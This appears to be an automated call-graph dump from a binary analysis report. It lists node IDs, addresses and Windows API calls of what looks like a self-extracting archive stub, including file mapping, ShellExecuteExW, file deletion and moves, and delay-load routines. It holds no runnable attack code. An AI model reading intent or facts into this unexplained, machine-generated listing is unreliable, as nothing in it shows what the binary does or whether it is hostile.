24019 827615 FreeLibrary 24016->24019 24020 82761e 24016->24020 24018 827601 24017->24018 24018->24016 24019->24020 24021 81ec4a _ValidateLocalCookies 5 API calls 24020->24021 24022 827628 24021->24022 24022->23990 24023->23989 24025->24006 24027 82a85b 24026->24027 24030 82a851 24026->24030 24028 82a458 FindHandler 5 API calls 24027->24028 24028->24030 24029 81ec4a _ValidateLocalCookies 5 API calls 24031 827547 24029->24031 24030->24029 24031->24010 24031->24011 24032 8010d5 24037 805bd7 24032->24037 24038 805be1 __EH_prolog 24037->24038 24043 80b07d 24038->24043 24040 805bed 24049 805dcc GetCurrentProcess GetProcessAffinityMask 24040->24049 24044 80b087 __EH_prolog 24043->24044 24050 80ea80 80 API calls 24044->24050 24046 80b099 24051 80b195 24046->24051 24050->24046 24052 80b1a7 ___scrt_get_show_window_mode 24051->24052 24055 810948 24052->24055 24058 810908 GetCurrentProcess GetProcessAffinityMask 24055->24058 24059 80b10f 24058->24059 24059->24040 24073 81aee0 24074 81aeea __EH_prolog 24073->24074 24236 80130b 24074->24236 24077 81b5cb 24301 81cd2e 24077->24301 24078 81af2c 24080 81afa2 24078->24080 24081 81af39 24078->24081 24142 81af18 24078->24142 24083 81b041 GetDlgItemTextW 24080->24083 24089 81afbc 24080->24089 24084 81af3e 24081->24084 24091 81af75 24081->24091 24090 81b077 24083->24090 24083->24091 24097 80ddd1 53 API calls 24084->24097 24084->24142 24085 81b5f7 24087 81b611 GetDlgItem SendMessageW 24085->24087 24088 81b600 SendDlgItemMessageW 24085->24088 24086 81b5e9 SendMessageW 24086->24085 24319 819da4 GetCurrentDirectoryW 24087->24319 24088->24087 24096 80ddd1 53 API calls 24089->24096 24094 81b080 24090->24094 24095 81b08f GetDlgItem 24090->24095 24092 81af96 KiUserCallbackDispatcher 24091->24092 24091->24142 24092->24142 24094->24091 24111 81b56b 24094->24111 24099 81b0c5 SetFocus 24095->24099 24100 81b0a4 SendMessageW SendMessageW 24095->24100 24101 81afde SetDlgItemTextW 24096->24101 24102 81af58 24097->24102 24098 81b641 GetDlgItem 24103 81b664 SetWindowTextW 24098->24103 24104 81b65e 24098->24104 24105 81b0d5 24099->24105 24121 81b0ed 24099->24121 24100->24099 24106 81afec 24101->24106 24339 801241 SHGetMalloc 24102->24339 24320 81a2c7 GetClassNameW 24103->24320 24104->24103 24109 80ddd1 53 API calls 24105->24109 24115 81aff9 GetMessageW 24106->24115 24106->24142 24114 81b0df 24109->24114 24110 81af5f 24116 81af63 SetDlgItemTextW 24110->24116 24110->24142 24112 80ddd1 53 API calls 24111->24112 24117 81b57b SetDlgItemTextW 24112->24117 24340 81cb5a 24114->24340 24120 81b010 IsDialogMessageW 24115->24120 24115->24142 24116->24142 24122 81b58f 24117->24122 24120->24106 24124 81b01f TranslateMessage DispatchMessageW 24120->24124 24125 80ddd1 53 API calls 24121->24125 24127 80ddd1 53 API calls 24122->24127 24124->24106 24126 81b124 24125->24126 24129 80400a _swprintf 51 API calls 24126->24129 24130 81b5b8 24127->24130 24128 81b6af 24134 81b6df 24128->24134 24135 80ddd1 53 API calls 24128->24135 24136 81b136 24129->24136 24137 80ddd1 53 API calls 24130->24137 24131 81b0e6 24246 80a04f 24131->24246 24133 81bdf5 98 API calls 24133->24128 24141 81bdf5 98 API calls 24134->24141 24173 81b797 24134->24173 24139 81b6c2 SetDlgItemTextW 24135->24139 24140 81cb5a 16 API calls 24136->24140 24137->24142 24146 80ddd1 53 API calls 24139->24146 24140->24131 24147 81b6fa 24141->24147 24143 81b847 24148 81b850 EnableWindow 24143->24148 24149 81b859 24143->24149 24144 81b174 GetLastError 24145 81b17f 24144->24145 24252 81a322 SetCurrentDirectoryW 24145->24252 24152 81b6d6 SetDlgItemTextW 24146->24152 24157 81b70c 24147->24157 24174 81b731 24147->24174 24148->24149 24153 81b876 24149->24153 24358 8012c8 GetDlgItem EnableWindow 24149->24358 24151 81b195 24154 81b1ac 24151->24154 24155 81b19e GetLastError 24151->24155 24152->24134 24156 81b89d 24153->24156 24165 81b895 SendMessageW 24153->24165 24164 81b227 24154->24164 24168 81b237 24154->24168 24170 81b1c4 GetTickCount 24154->24170 24155->24154 24156->24142 24166 80ddd1 53 API calls 24156->24166 24356 819635 32 API calls 24157->24356 24158 81b78a 24161 81bdf5 98 API calls 24158->24161 24160 81b86c 24359 8012c8 GetDlgItem EnableWindow 24160->24359 24161->24173 24164->24168 24169 81b46c 24164->24169 24165->24156 24172 81b8b6 SetDlgItemTextW 24166->24172 24167 81b725 24167->24174 24176 81b407 24168->24176 24177 81b24f GetModuleFileNameW 24168->24177 24261 8012e6 GetDlgItem ShowWindow 24169->24261 24178 80400a _swprintf 51 API calls 24170->24178 24171 81b825 24357 819635 32 API calls 24171->24357 24172->24142 24173->24143 24173->24171 24180 80ddd1 53 API calls 24173->24180 24174->24158 24181 81bdf5 98 API calls 24174->24181 24176->24091 24189 80ddd1 53 API calls 24176->24189 24350 80eb3a 80 API calls 24177->24350 24184 81b1dd 24178->24184 24180->24173 24186 81b75f 24181->24186 24182 81b47c 24262 8012e6 GetDlgItem ShowWindow 24182->24262 24253 80971e 24184->24253 24185 81b844 24185->24143 24186->24158 24190 81b768 DialogBoxParamW 24186->24190 24188 81b275 24192 80400a _swprintf 51 API calls 24188->24192 24193 81b41b 24189->24193 24190->24091 24190->24158 24191 81b486 24194 80ddd1 53 API calls 24191->24194 24195 81b297 CreateFileMappingW 24192->24195 24196 80400a _swprintf 51 API calls 24193->24196 24198 81b490 SetDlgItemTextW 24194->24198 24199 81b2f9 GetCommandLineW 24195->24199 24231 81b376 __vswprintf_c_l 24195->24231 24200 81b439 24196->24200 24263 8012e6 GetDlgItem ShowWindow 24198->24263 24204 81b30a 24199->24204 24213 80ddd1 53 API calls 24200->24213 24201 81b203 24205 81b215 24201->24205 24206 81b20a GetLastError 24201->24206 24202 81b381 ShellExecuteExW 24226 81b39e 24202->24226 24351 81ab2e SHGetMalloc 24204->24351 24207 809653 79 API calls 24205->24207 24206->24205 24207->24164 24208 81b4a2 SetDlgItemTextW GetDlgItem 24210 81b4d7 24208->24210 24211 81b4bf GetWindowLongW SetWindowLongW 24208->24211 24264 81bdf5 24210->24264 24211->24210 24212 81b326 24352 81ab2e SHGetMalloc 24212->24352 24213->24091 24216 81b332 24353 81ab2e SHGetMalloc 24216->24353 24218 81bdf5 98 API calls 24221 81b4f3 24218->24221 24220 81b3e1 24220->24176 24225 81b3f7 UnmapViewOfFile CloseHandle 24220->24225 24289 81d0f5 24221->24289 24222 81b33e 24354 80ecad 80 API calls ___scrt_get_show_window_mode 24222->24354 24225->24176 24226->24220 24229 81b3cd Sleep 24226->24229 24228 81b355 MapViewOfFile 24228->24231 24229->24220 24229->24226 24230 81bdf5 98 API calls 24234 81b519 24230->24234 24231->24202 24232 81b542 24355 8012c8 GetDlgItem EnableWindow 24232->24355 24234->24232 24235 81bdf5 98 API calls 24234->24235 24235->24232 24237 80136d 24236->24237 24240 801314 24236->24240 24361 80da71 GetWindowLongW SetWindowLongW 24237->24361 24239 80137a 24239->24077 24239->24078 24239->24142 24240->24239 24360 80da98 62 API calls 2 library calls 24240->24360 24242 801336 24242->24239 24243 801349 GetDlgItem 24242->24243 24243->24239 24244 801359 24243->24244 24244->24239 24245 80135f SetWindowTextW 24244->24245 24245->24239 24249 80a059 24246->24249 24247 80a0ea 24248 80a207 9 API calls 24247->24248 24250 80a113 24247->24250 24248->24250 24249->24247 24249->24250 24362 80a207 24249->24362 24250->24144 24250->24145 24252->24151 24254 809728 24253->24254 24255 809792 CreateFileW 24254->24255 24256 809786 24254->24256 24255->24256 24257 8097e4 24256->24257 24258 80b66c 2 API calls 24256->24258 24257->24201 24259 8097cb 24258->24259 24259->24257 24260 8097cf CreateFileW 24259->24260 24260->24257 24261->24182 24262->24191 24263->24208 24265 81bdff __EH_prolog 24264->24265 24266 81b4e5 24265->24266 24267 81aa36 ExpandEnvironmentStringsW 24265->24267 24266->24218 24278 81be36 _wcsrchr 24267->24278 24269 81aa36 ExpandEnvironmentStringsW 24269->24278 24270 81c11d SetWindowTextW 24270->24278 24273 8235de 22 API calls 24273->24278 24275 81bf0b SetFileAttributesW 24277 81bfc5 GetFileAttributesW 24275->24277 24288 81bf25 ___scrt_get_show_window_mode 24275->24288 24277->24278 24280 81bfd7 DeleteFileW 24277->24280 24278->24266 24278->24269 24278->24270 24278->24273 24278->24275 24281 81c2e7 GetDlgItem SetWindowTextW SendMessageW 24278->24281 24284 81c327 SendMessageW 24278->24284 24383 8117ac CompareStringW 24278->24383 24384 819da4 GetCurrentDirectoryW 24278->24384 24386 80a52a 7 API calls 24278->24386 24387 80a4b3 FindClose 24278->24387 24388 81ab9a 76 API calls ___std_exception_copy 24278->24388 24280->24278 24282 81bfe8 24280->24282 24281->24278 24283 80400a _swprintf 51 API calls 24282->24283 24285 81c008 GetFileAttributesW 24283->24285 24284->24278 24285->24282 24286 81c01d MoveFileW 24285->24286 24286->24278 24287 81c035 MoveFileExW 24286->24287 24287->24278 24288->24277 24288->24278 24385 80b4f7 52 API calls 2 library calls 24288->24385 24290 81d0ff __EH_prolog 24289->24290 24389 80fead 24290->24389 24292 81d130 24393 805c59 24292->24393 24294 81d14e 24397 807c68 24294->24397 24298 81d1a1 24414 807cfb 24298->24414 24300 81b504 24300->24230 24302 81cd38 24301->24302 24303 819d1a 4 API calls 24302->24303 24304 81cd3d 24303->24304 24305 81cd45 GetWindow 24304->24305 24306 81b5d1 24304->24306 24305->24306 24312 81cd65 24305->24312 24306->24085 24306->24086 24307 81cd72 GetClassNameW 24858 8117ac CompareStringW 24307->24858 24309 81cd96 GetWindowLongW 24310 81cdfa GetWindow 24309->24310 24311 81cda6 SendMessageW 24309->24311 24310->24306 24310->24312 24311->24310 24313 81cdbc GetObjectW 24311->24313 24312->24306 24312->24307 24312->24309 24312->24310 24859 819d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24313->24859 24315 81cdd3 24860 819d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24315->24860 24861 819f5d 8 API calls ___scrt_get_show_window_mode 24315->24861 24318 81cde4 SendMessageW DeleteObject 24318->24310 24319->24098 24321 81a2e8 24320->24321 24322 81a30d 24320->24322 24862 8117ac CompareStringW 24321->24862 24326 81a7c3 24322->24326 24324 81a2fb 24324->24322 24325 81a2ff FindWindowExW 24324->24325 24325->24322 24327 81a7cd __EH_prolog 24326->24327 24328 801380 82 API calls 24327->24328 24329 81a7ef 24328->24329 24863 801f4f 24329->24863 24332 81a809 24334 801631 84 API calls 24332->24334 24333 81a818 24335 801951 126 API calls 24333->24335 24336 81a814 24334->24336 24338 81a83a __vswprintf_c_l ___std_exception_copy 24335->24338 24336->24128 24336->24133 24337 801631 84 API calls 24337->24336 24338->24336 24338->24337 24339->24110 24871 81ac74 PeekMessageW 24340->24871 24343 81cbbc SendMessageW SendMessageW 24345 81cc17 SendMessageW SendMessageW SendMessageW 24343->24345 24346 81cbf8 24343->24346 24344 81cb88 24347 81cb93 ShowWindow SendMessageW SendMessageW 24344->24347 24348 81cc4a SendMessageW 24345->24348 24349 81cc6d SendMessageW 24345->24349 24346->24345 24347->24343 24348->24349 24349->24131 24350->24188 24351->24212 24352->24216 24353->24222 24354->24228 24355->24094 24356->24167 24357->24185 24358->24160 24359->24153 24360->24242 24361->24239 24363 80a214 24362->24363 24364 80a238 24363->24364 24365 80a22b CreateDirectoryW 24363->24365 24366 80a180 4 API calls 24364->24366 24365->24364 24367 80a26b 24365->24367 24368 80a23e 24366->24368 24371 80a27a 24367->24371 24375 80a444 24367->24375 24369 80a27e GetLastError 24368->24369 24372 80b66c 2 API calls 24368->24372 24369->24371 24371->24249 24373 80a254 24372->24373 24373->24369 24374 80a258 CreateDirectoryW 24373->24374 24374->24367 24374->24369 24376 81e360 24375->24376 24377 80a451 SetFileAttributesW 24376->24377 24378 80a494 24377->24378 24379 80a467 24377->24379 24378->24371 24380 80b66c 2 API calls 24379->24380 24381 80a47b 24380->24381 24381->24378 24382 80a47f SetFileAttributesW 24381->24382 24382->24378 24383->24278 24384->24278 24385->24288 24386->24278 24387->24278 24388->24278 24390 80feba 24389->24390 24418 801789 24390->24418 24392 80fed2 24392->24292 24394 80fead 24393->24394 24395 801789 76 API calls 24394->24395 24396 80fed2 24395->24396 24396->24294 24398 807c72 __EH_prolog 24397->24398 24435 80c827 24398->24435 24400 807c8d 24401 81e24a new 8 API calls 24400->24401 24402 807cb7 24401->24402 24441 81440b 24402->24441 24405 807ddf 24406 807de9 24405->24406 24411 807e53 24406->24411 24470 80a4c6 24406->24470 24408 807f06 24408->24298 24410 807ec4 24410->24408 24476 806dc1 74 API calls 24410->24476 24411->24410 24413 80a4c6 8 API calls 24411->24413 24448 80837f 24411->24448 24413->24411 24415 807d09 24414->24415 24417 807d10 24414->24417 24416 811acf 84 API calls 24415->24416 24416->24417 24419 80179f 24418->24419 24430 8017fa __vswprintf_c_l 24418->24430 24420 8017c8 24419->24420 24431 806e91 74 API calls __vswprintf_c_l 24419->24431 24422 801827 24420->24422 24427 8017e7 ___std_exception_copy 24420->24427 24424 8235de 22 API calls 24422->24424 24423 8017be 24432 806efd 75 API calls 24423->24432 24426 80182e 24424->24426 24426->24430 24434 806efd 75 API calls 24426->24434 24427->24430 24433 806efd 75 API calls 24427->24433 24430->24392 24431->24423 24432->24420 24433->24430 24434->24430 24436 80c831 __EH_prolog 24435->24436 24437 81e24a new 8 API calls 24436->24437 24438 80c874 24437->24438 24439 81e24a new 8 API calls 24438->24439 24440 80c898 24439->24440 24440->24400 24442 814415 __EH_prolog 24441->24442 24443 81e24a new 8 API calls 24442->24443 24444 814431 24443->24444 24445 807ce6 24444->24445 24447 8106ba 78 API calls 24444->24447 24445->24405 24447->24445 24449 808389 __EH_prolog 24448->24449 24477 801380 24449->24477 24451 8083a4 24485 809ef7 24451->24485 24456 8083cf 24458 8083d3 24456->24458 24467 80a4c6 8 API calls 24456->24467 24469 80846e 24456->24469 24612 80bac4 CompareStringW 24456->24612 24608 801631 24458->24608 24462 8084ce 24511 801f00 24462->24511 24465 8084d9 24465->24458 24515 803aac 24465->24515 24525 80857b 24465->24525 24467->24456 24504 808517 24469->24504 24471 80a4db 24470->24471 24475 80a4df 24471->24475 24846 80a5f4 24471->24846 24473 80a4ef 24474 80a4f4 FindClose 24473->24474 24473->24475 24474->24475 24475->24406 24476->24408 24478 801385 __EH_prolog 24477->24478 24479 80c827 8 API calls 24478->24479 24480 8013bd 24479->24480 24481 81e24a new 8 API calls 24480->24481 24484 801416 ___scrt_get_show_window_mode 24480->24484 24482 801403 24481->24482 24483 80b07d 82 API calls 24482->24483 24482->24484 24483->24484 24484->24451 24486 809f0e 24485->24486 24487 8083ba 24486->24487 24613 806f5d 76 API calls 24486->24613 24487->24458 24489 8019a6 24487->24489 24490 8019b0 __EH_prolog 24489->24490 24501 801a00 24490->24501 24502 8019e5 24490->24502 24614 80709d 24490->24614 24492 801b50 24617 806dc1 74 API calls 24492->24617 24494 803aac 97 API calls 24497 801bb3 24494->24497 24495 801b60 24495->24494 24495->24502 24496 801bff 24496->24502 24503 801c32 24496->24503 24618 806dc1 74 API calls 24496->24618 24497->24496 24499 803aac 97 API calls 24497->24499 24499->24497 24500 803aac 97 API calls 24500->24503 24501->24492 24501->24495 24501->24502 24502->24456 24503->24500 24503->24502 24505 808524 24504->24505 24636 810c26 GetSystemTime SystemTimeToFileTime 24505->24636 24507 808488 24507->24462 24508 811359 24507->24508 24638 81d51a 24508->24638 24513 801f05 __EH_prolog 24511->24513 24512 801f39 24512->24465 24513->24512 24646 801951 24513->24646 24516 803ab8 24515->24516 24517 803abc 24515->24517 24516->24465 24518 803af7 24517->24518 24519 803ae9 24517->24519 24781 8027e8 97 API calls 3 library calls 24518->24781 24520 803b29 24519->24520 24780 803281 85 API calls 3 library calls 24519->24780 24520->24465 24523 803af5 24523->24520 24782 80204e 74 API calls 24523->24782 24526 808585 __EH_prolog 24525->24526 24527 8085be 24526->24527 24540 8085c2 24526->24540 24805 8184bd 99 API calls 24526->24805 24528 8085e7 24527->24528 24534 80867a 24527->24534 24527->24540 24529 808609 24528->24529 24528->24540 24806 807b66 151 API calls 24528->24806 24529->24540 24807 8184bd 99 API calls 24529->24807 24534->24540 24783 805e3a 24534->24783 24535 808705 24535->24540 24789 80826a 24535->24789 24538 808875 24539 80a4c6 8 API calls 24538->24539 24541 8088e0 24538->24541 24539->24541 24540->24465 24793 807d6c 24541->24793 24543 80c991 80 API calls 24546 80893b _memcmp 24543->24546 24544 808a70 24545 808b43 24544->24545 24553 808abf 24544->24553 24550 808b9e 24545->24550 24558 808b4e 24545->24558 24546->24540 24546->24543 24546->24544 24547 808a69 24546->24547 24808 808236 82 API calls 24546->24808 24809 801f94 74 API calls 24546->24809 24810 801f94 74 API calls 24547->24810 24551 808b30 24550->24551 24813 8080ea 96 API calls 24550->24813 24552 808c09 24551->24552 24559 808b9c 24551->24559 24561 809989 GetFileType 24552->24561 24571 808c74 24552->24571 24598 8091c1 ___InternalCxxFrameHandler 24552->24598 24553->24551 24555 80a180 4 API calls 24553->24555 24554 809653 79 API calls 24554->24540 24560 808af7 24555->24560 24557 809653 79 API calls 24557->24540 24558->24559 24812 807f26 100 API calls ___InternalCxxFrameHandler 24558->24812 24559->24554 24560->24551 24811 809377 96 API calls 24560->24811 24563 808c4c 24561->24563 24562 80aa88 8 API calls 24565 808cc3 24562->24565 24563->24571 24814 801f94 74 API calls 24563->24814 24567 80aa88 8 API calls 24565->24567 24586 808cd9 24567->24586 24569 808c62 24815 807061 75 API calls 24569->24815 24571->24562 24572 808d9c 24573 808df7 24572->24573 24574 808efd 24572->24574 24575 808e69 24573->24575 24578 808e07 24573->24578 24576 808f23 24574->24576 24577 808f0f 24574->24577 24596 808e27 24574->24596 24579 80826a CharUpperW 24575->24579 24581 812c42 75 API calls 24576->24581 24580 8092e6 121 API calls 24577->24580 24582 808e4d 24578->24582 24587 808e15 24578->24587 24583 808e84 24579->24583 24580->24596 24585 808f3c 24581->24585 24582->24596 24818 807907 108 API calls 24582->24818 24591 808eb4 24583->24591 24592 808ead 24583->24592 24583->24596 24821 8128f1 121 API calls 24585->24821 24586->24572 24816 809b21 SetFilePointer GetLastError SetEndOfFile 24586->24816 24817 801f94 74 API calls 24587->24817 24820 809224 94 API calls __EH_prolog 24591->24820 24819 807698 84 API calls ___InternalCxxFrameHandler 24592->24819 24599 80904b 24596->24599 24822 801f94 74 API calls 24596->24822 24597 809156 24597->24598 24600 80a444 4 API calls 24597->24600 24598->24557 24599->24597 24599->24598 24601 809104 24599->24601 24799 809ebf SetEndOfFile 24599->24799 24602 8091b1 24600->24602 24800 809d62 24601->24800 24602->24598 24823 801f94 74 API calls 24602->24823 24605 80914b 24607 8096d0 75 API calls 24605->24607 24607->24597 24609 801643 24608->24609 24838 80c8ca 24609->24838 24612->24456 24613->24487 24619 8016d2 24614->24619 24616 8070b9 24616->24501 24617->24502 24618->24503 24620 8016e8 24619->24620 24631 801740 __vswprintf_c_l 24619->24631 24621 801711 24620->24621 24632 806e91 74 API calls __vswprintf_c_l 24620->24632 24622 801767 24621->24622 24628 80172d ___std_exception_copy 24621->24628 24624 8235de 22 API calls 24622->24624 24626 80176e 24624->24626 24625 801707 24633 806efd 75 API calls 24625->24633 24626->24631 24635 806efd 75 API calls 24626->24635 24628->24631 24634 806efd 75 API calls 24628->24634 24631->24616 24632->24625 24633->24621 24634->24631 24635->24631 24637 810c56 __vswprintf_c_l 24636->24637 24637->24507 24639 81d527 24638->24639 24640 80ddd1 53 API calls 24639->24640 24641 81d54a 24640->24641 24642 80400a _swprintf 51 API calls 24641->24642 24643 81d55c 24642->24643 24644 81cb5a 16 API calls 24643->24644 24645 811372 24644->24645 24645->24462 24647 801961 24646->24647 24649 80195d 24646->24649 24650 801896 24647->24650 24649->24512 24651 8018a8 24650->24651 24653 8018e5 24650->24653 24652 803aac 97 API calls 24651->24652 24656 8018c8 24652->24656 24658 803f18 24653->24658 24656->24649 24662 803f21 24658->24662 24659 803aac 97 API calls 24659->24662 24660 801906 24660->24656 24663 801e00 24660->24663 24662->24659 24662->24660 24675 81067c 24662->24675 24664 801e0a __EH_prolog 24663->24664 24683 803b3d 24664->24683 24666 801e34 24667 801ebb 24666->24667 24668 8016d2 76 API calls 24666->24668 24667->24656 24669 801e4b 24668->24669 24711 801849 76 API calls 24669->24711 24671 801e63 24673 801e6f 24671->24673 24712 81137a MultiByteToWideChar 24671->24712 24713 801849 76 API calls 24673->24713 24676 810683 24675->24676 24677 81069e 24676->24677 24681 806e8c RaiseException FindHandler 24676->24681 24679 8106af SetThreadExecutionState 24677->24679 24682 806e8c RaiseException FindHandler 24677->24682 24679->24662 24681->24677 24682->24679 24684 803b47 __EH_prolog 24683->24684 24685 803b79 24684->24685 24686 803b5d 24684->24686 24688 803dc2 24685->24688 24691 803ba5 24685->24691 24742 806dc1 74 API calls 24686->24742 24759 806dc1 74 API calls 24688->24759 24690 803b68 24690->24666 24691->24690 24714 812c42 24691->24714 24693 803c26 24694 803cb1 24693->24694 24710 803c1d 24693->24710 24745 80c991 24693->24745 24727 80aa88 24694->24727 24695 803c22 24695->24693 24744 802034 76 API calls 24695->24744 24697 803c12 24743 806dc1 74 API calls 24697->24743 24698 803bf4 24698->24693 24698->24695 24698->24697 24700 803cc4 24704 803d48 24700->24704 24705 803d3e 24700->24705 24751 8128f1 121 API calls 24704->24751 24731 8092e6 24705->24731 24708 803d46 24708->24710 24752 801f94 74 API calls 24708->24752 24753 811acf 24710->24753 24711->24671 24712->24673 24713->24667 24715 812c51 24714->24715 24717 812c5b 24714->24717 24760 806efd 75 API calls 24715->24760 24719 812ca2 ___std_exception_copy 24717->24719 24721 812c9d Concurrency::cancel_current_task 24717->24721 24726 812cfd ___scrt_get_show_window_mode 24717->24726 24718 812da9 Concurrency::cancel_current_task 24763 82157a RaiseException 24718->24763 24719->24718 24720 812cd9 24719->24720 24719->24726 24761 812b7b 75 API calls 4 library calls 24720->24761 24762 82157a RaiseException 24721->24762 24725 812dc1 24726->24698 24728 80aa95 24727->24728 24730 80aa9f 24727->24730 24729 81e24a new 8 API calls 24728->24729 24729->24730 24730->24700 24732 8092f0 __EH_prolog 24731->24732 24764 807dc6 24732->24764 24735 80709d 76 API calls 24736 809302 24735->24736 24767 80ca6c 24736->24767 24738 80935c 24738->24708 24740 80ca6c 114 API calls 24741 809314 24740->24741 24741->24738 24741->24740 24776 80cc51 97 API calls __vswprintf_c_l 24741->24776 24742->24690 24743->24710 24744->24693 24746 80c9b2 24745->24746 24747 80c9c4 24745->24747 24777 806249 80 API calls 24746->24777 24778 806249 80 API calls 24747->24778 24750 80c9bc 24750->24694 24751->24708 24752->24710 24754 811ad9 24753->24754 24755 811af2 24754->24755 24758 811b06 24754->24758 24779 81075b 84 API calls 24755->24779 24757 811af9 24757->24758 24759->24690 24760->24717 24761->24726 24762->24718 24763->24725 24765 80acf5 GetVersionExW 24764->24765 24766 807dcb 24765->24766 24766->24735 24772 80ca82 __vswprintf_c_l 24767->24772 24768 80cbf7 24769 80cc1f 24768->24769 24770 80ca0b 6 API calls 24768->24770 24771 81067c SetThreadExecutionState RaiseException 24769->24771 24770->24769 24774 80cbee 24771->24774 24772->24768 24773 8184bd 99 API calls 24772->24773 24772->24774 24775 80ab70 89 API calls 24772->24775 24773->24772 24774->24741 24775->24772 24776->24741 24777->24750 24778->24750 24779->24757 24780->24523 24781->24523 24782->24520 24784 805e4a 24783->24784 24824 805d67 24784->24824 24787 805e7d 24788 805eb5 24787->24788 24829 80ad65 CharUpperW CompareStringW 24787->24829 24788->24535 24790 808289 24789->24790 24835 81179d CharUpperW 24790->24835 24792 808333 24792->24538 24794 807d7b 24793->24794 24795 807dbb 24794->24795 24836 807043 74 API calls 24794->24836 24795->24546 24797 807db3 24837 806dc1 74 API calls 24797->24837 24799->24601 24801 809d73 24800->24801 24804 809d82 24800->24804 24802 809d79 FlushFileBuffers 24801->24802 24801->24804 24802->24804 24803 809dfb SetFileTime 24803->24605 24804->24803 24805->24527 24806->24529 24807->24540 24808->24546 24809->24546 24810->24544 24811->24551 24812->24559 24813->24551 24814->24569 24815->24571 24816->24572 24817->24596 24818->24596 24819->24596 24820->24596 24821->24596 24822->24599 24823->24598 24830 805c64 24824->24830 24826 805d88 24826->24787 24828 805c64 2 API calls 24828->24826 24829->24787 24833 805c6e 24830->24833 24831 805d56 24831->24826 24831->24828 24833->24831 24834 80ad65 CharUpperW CompareStringW 24833->24834 24834->24833 24835->24792 24836->24797 24837->24795 24839 80c8db 24838->24839 24844 80a90e 84 API calls 24839->24844 24841 80c90d 24845 80a90e 84 API calls 24841->24845 24843 80c918 24844->24841 24845->24843 24847 80a5fe 24846->24847 24848 80a691 FindNextFileW 24847->24848 24849 80a621 FindFirstFileW 24847->24849 24850 80a6b0 24848->24850 24851 80a69c GetLastError 24848->24851 24852 80a638 24849->24852 24857 80a675 24849->24857 24850->24857 24851->24850 24853 80b66c 2 API calls 24852->24853 24854 80a64d 24853->24854 24855 80a651 FindFirstFileW 24854->24855 24856 80a66a GetLastError 24854->24856 24855->24856 24855->24857 24856->24857 24857->24473 24858->24312 24859->24315 24860->24315 24861->24318 24862->24324 24864 809ef7 76 API calls 24863->24864 24865 801f5b 24864->24865 24866 8019a6 97 API calls 24865->24866 24869 801f78 24865->24869 24867 801f68 24866->24867 24867->24869 24870 806dc1 74 API calls 24867->24870 24869->24332 24869->24333 24870->24869 24872 81acc8 GetDlgItem 24871->24872 24873 81ac8f GetMessageW 24871->24873 24872->24343 24872->24344 24874 81aca5 IsDialogMessageW 24873->24874 24875 81acb4 TranslateMessage DispatchMessageW 24873->24875 24874->24872 24874->24875 24875->24872 24919 81b8e0 93 API calls _swprintf 24920 818ce0 6 API calls 24923 8316e0 CloseHandle 24973 81ebf7 20 API calls 24892 81e1f9 24893 81e203 24892->24893 24894 81df59 ___delayLoadHelper2@8 19 API calls 24893->24894 24895 81e210 24894->24895 24926 8214f8 RaiseException 22940 81db01 22941 81daaa 22940->22941 22943 81df59 22941->22943 22971 81dc67 22943->22971 22945 81df73 22946 81dfd0 22945->22946 22947 81dff4 22945->22947 22948 81ded7 DloadReleaseSectionWriteAccess 11 API calls 22946->22948 22951 81e06c LoadLibraryExA 22947->22951 22953 81e0cd 22947->22953 22955 81e0df 22947->22955 22967 81e19b 22947->22967 22949 81dfdb RaiseException 22948->22949 22965 81e1c9 22949->22965 22951->22953 22954 81e07f GetLastError 22951->22954 22952 81e1d8 22952->22941 22953->22955 22959 81e0d8 FreeLibrary 22953->22959 22956 81e092 22954->22956 22957 81e0a8 22954->22957 22958 81e13d GetProcAddress 22955->22958 22955->22967 22956->22953 22956->22957 22960 81ded7 DloadReleaseSectionWriteAccess 11 API calls 22957->22960 22961 81e14d GetLastError 22958->22961 22958->22967 22959->22955 22962 81e0b3 RaiseException 22960->22962 22963 81e160 22961->22963 22962->22965 22966 81ded7 DloadReleaseSectionWriteAccess 11 API calls 22963->22966 22963->22967 22990 81ec4a 22965->22990 22968 81e181 RaiseException 22966->22968 22982 81ded7 22967->22982 22969 81dc67 ___delayLoadHelper2@8 11 API calls 22968->22969 22970 81e198 22969->22970 22970->22967 22972 81dc73 22971->22972 22973 81dc99 22971->22973 22997 81dd15 22972->22997 22973->22945 22976 81dc94 23007 81dc9a 22976->23007 22979 81ec4a _ValidateLocalCookies 5 API calls 22980 81df55 22979->22980 22980->22945 22981 81df24 22981->22979 22983 81dee9 22982->22983 22984 81df0b 22982->22984 22985 81dd15 DloadLock 8 API calls 22983->22985 22984->22965 22986 81deee 22985->22986 22987 81df06 22986->22987 22989 81de67 DloadProtectSection 3 API calls 22986->22989 23016 81df0f 8 API calls 2 library calls 22987->23016 22989->22987 22991 81ec53 22990->22991 22992 81ec55 IsProcessorFeaturePresent 22990->22992 22991->22952 22994 81f267 22992->22994 23017 81f22b SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 22994->23017 22996 81f34a 22996->22952 22998 81dc9a DloadUnlock 3 API calls 22997->22998 22999 81dd2a 22998->22999 23000 81ec4a _ValidateLocalCookies 5 API calls 22999->23000 23001 81dc78 23000->23001 23001->22976 23002 81de67 23001->23002 23004 81de7c DloadObtainSection 23002->23004 23003 81deb7 VirtualProtect 23005 81de82 23003->23005 23004->23003 23004->23005 23015 81dd72 VirtualQuery GetSystemInfo 23004->23015 23005->22976 23008 81dca7 23007->23008 23009 81dcab 23007->23009 23008->22981 23010 81dcb3 GetModuleHandleW 23009->23010 23011 81dcaf 23009->23011 23012 81dcc9 GetProcAddress 23010->23012 23014 81dcc5 23010->23014 23011->22981 23013 81dcd9 GetProcAddress 23012->23013 23012->23014 23013->23014 23014->22981 23015->23003 23016->22984 23017->22996 23018 81ea00 23019 81ea08 pre_c_initialization 23018->23019 23036 828292 23019->23036 23021 81ea13 pre_c_initialization 23043 81e600 23021->23043 23023 81ea9c 23054 81ef05 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 23023->23054 23025 81ea28 __RTC_Initialize 23025->23023 23048 81e7a1 23025->23048 23026 81eaa3 ___scrt_initialize_default_local_stdio_options 23028 81ea41 pre_c_initialization 23028->23023 23029 81ea52 23028->23029 23051 81f15b InitializeSListHead 23029->23051 23031 81ea57 pre_c_initialization ___InternalCxxFrameHandler 23052 81f167 30 API calls 2 library calls 23031->23052 23033 81ea7a pre_c_initialization 23053 828332 38 API calls 3 library calls 23033->23053 23035 81ea85 pre_c_initialization 23037 8282a1 23036->23037 23038 8282c4 23036->23038 